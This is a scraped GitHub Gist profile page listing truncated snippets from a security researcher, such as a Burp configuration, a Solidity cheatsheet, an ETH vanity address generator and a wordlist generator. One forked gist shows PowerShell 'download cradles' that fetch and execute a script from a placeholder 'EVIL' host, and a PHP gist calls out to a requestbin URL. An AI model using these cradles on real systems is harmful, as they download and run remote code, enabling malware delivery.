Skip to content

Instantly share code, notes, and snippets.

View lowk3v's full-sized avatar
💪
Finding bugs

LowK lowk3v

💪
Finding bugs
47 followers · 104 following
View GitHub Profile
@lowk3v
lowk3v / burp_defaults_combined.json
Created June 26, 2024 02:54 — forked from asadasivan/burp_defaults_combined.json
Burp Default Configuration file
{
"project_options":{
"connections":{
"hostname_resolution":[],
"out_of_scope_requests":{
"advanced_mode":false,
"drop_all_out_of_scope":false,
"exclude":[],
"include":[],
"scope_option":"suite"
@lowk3v
lowk3v / mac-words-reminder.sh
Created June 10, 2024 03:07
Random words to reminder on mac
#!env bash
mac_notify() {
# Usage: mac_notify "title" "subtitle" "message" "sound"
sound="Glass"
if [ "$#" -ge 4 ]; then
# mac_notify "title" "subtitle" "message" "sound"
title="with title \"$1\""
subtitle="subtitle \"$2\""
@lowk3v
lowk3v / Cheatsheet.sol.diff
Last active June 11, 2024 09:43
Fork from cheatsheet.sol#b2264b17 to highlight potential security in code.
// SPDX-License-Identifier: GPL-3.0
// ^ recommended, included machine readable in bytecode metadata
// Software Package Data Exchange is an open standard
pragma solidity ^0.8.15;
// ^ floating pragma, min 0.8.15 max excluding 0.9.0
// same as complex pragma: pragma solidity >=0.8.15 <0.9.0;
// major.breakingchanges.bugfixes
// only makes the compiler check for compatibility and throws error if not matching!
// should only be floating during development, fixed everywhere during testing & deployment
@lowk3v
lowk3v / random ETH address
Created December 26, 2022 02:42
var ethers = require('ethers');
var crypto = require('crypto');
var id = crypto.randomBytes(32).toString('hex');
var privateKey = "0x"+id;
var wallet = new ethers.Wallet(privateKey);
if (wallet.address.endsWith('979')){
console.log("SAVE BUT DO NOT SHARE THIS:", privateKey);
@lowk3v
lowk3v / index.php
Created August 20, 2021 06:27
<?php
file_get_contents('https://requestbin.net/r/dp65ck5s?xxxx');
@lowk3v
lowk3v / confirmed_openredirect
Created August 15, 2021 13:59
Confirmed Open Redirect Vulnerability
@lowk3v
lowk3v / python3_http2
Created June 29, 2021 06:14
import requests
from urllib import parse
from hyper import HTTPConnection
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
PROXY = {
'http': 'http://127.0.0.1:8099',
'https': 'http://127.0.0.1:8099',
@lowk3v
lowk3v / grpc_overview
Last active June 20, 2021 15:40
# GRPC WITH JAVA GOLANG
## 2. gRPC với Protocol Buffer
### 2.1 Protobuf code example
```
syntax = "proto3";
message HelloRequest {
@lowk3v
lowk3v / DownloadCradles.ps1
Created January 16, 2019 11:20 — forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@lowk3v
lowk3v / create_dict.py
Created November 24, 2018 08:33
create dictionary for bruteforce in python
from itertools import chain, product
import string
def dict_all_size(charset, minlength, maxlength):
return (''.join(candidate)
for candidate in chain.from_iterable(product(charset, repeat=i)
for i in range(minlength, maxlength + 1)))
print([i for i in dict_all_size(string.hexdigits[:16], 2, 2)])